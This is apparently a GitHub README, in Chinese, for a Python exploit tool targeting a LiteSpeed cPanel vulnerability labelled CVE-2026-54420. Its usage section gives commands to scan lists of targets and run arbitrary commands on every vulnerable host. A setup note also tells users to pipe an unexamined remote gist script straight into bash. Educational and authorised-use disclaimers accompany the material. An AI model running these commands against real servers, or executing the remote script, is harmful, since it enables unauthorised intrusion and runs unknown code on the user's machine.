HORKimhab/CVE-2026-54420
GitHub: HORKimhab/CVE-2026-54420
针对 LiteSpeed cPanel 漏洞 CVE-2026-54420 的 Python 漏洞扫描与命令执行验证工具。
Stars: 1 | Forks: 0
# CVE-2026-54420 LiteSpeed cPanel
## ⚡ 简单用法
仅在以下安全且经过授权的环境中使用此项目:
- 本地虚拟机
- Docker 容器
- 隔离的实验室环境
- 授权的渗透测试环境
示例设置:
```
git clone
cd
# 项目使用 python,请遵循以下步骤
# 创建虚拟环境
python -m venv venv
# 激活虚拟环境
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# 安装 requirments
pip install -r requirements.txt
```
示例用法:
```
# 单目标扫描
python cve-2026-54420.py -t http://localhost:3000
# 从 targets.txt 文件扫描
python cve-2026-54420.py -t targets.txt
# 使用所有选项进行高级扫描
python cve-2026-54420.py -t targets.txt -v --threads 20 --timeout 15
# 在所有受影响的目标上执行命令
python cve-2026-54420.py -t targets.txt -c "whoami" --verbose
# 将结果保存到文件
python cve-2026-54420.py -t targets.txt --output results.json --format json
# 在所有受影响的目标上运行枚举
python cve-2026-54420.py -t targets.txt --enum --threads 10
```
注意:
- 克隆自其他项目,您必须运行 `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y` 来清除嵌套的 dir .git
- 例如:cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
# 📚 教育安全研究仓库
一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
## ⚠️ 安全与法律免责声明
## 目的
此仓库仅供**教育和授权的安全研究**使用。
旨在帮助用户了解:
- 安全漏洞
- 沙箱和隔离概念
- 安全编码和防御实践
## 仅限授权使用
仅在您已获授权的环境中使用此仓库,例如:
- 个人实验室或虚拟机
- Docker 或隔离环境
- 授权的渗透测试
- 网络安全培训或学术研究
严禁未经授权或非法使用。
## 免责声明
作者和贡献者对本项目造成的任何损坏、滥用、法律问题或损失**不承担任何责任**。
使用此仓库,即表示您同意:
- 您对自己的行为负责
- 您将合法且合乎道德地使用它
- 本项目按“原样”提供,**不提供任何担保**
## 道德使用
本项目旨在用于:
- 防御性安全研究
- 网络安全教育
- 漏洞防范意识
- 安全系统和软件研究
请遵循负责任的披露原则,并遵守所有适用法律。
## 联系方式
如需进行负责任的披露或合作,请通过 GitHub 联系仓库维护者。
标签:Python, XXE攻击, 命令与控制, 无后门, 逆向工具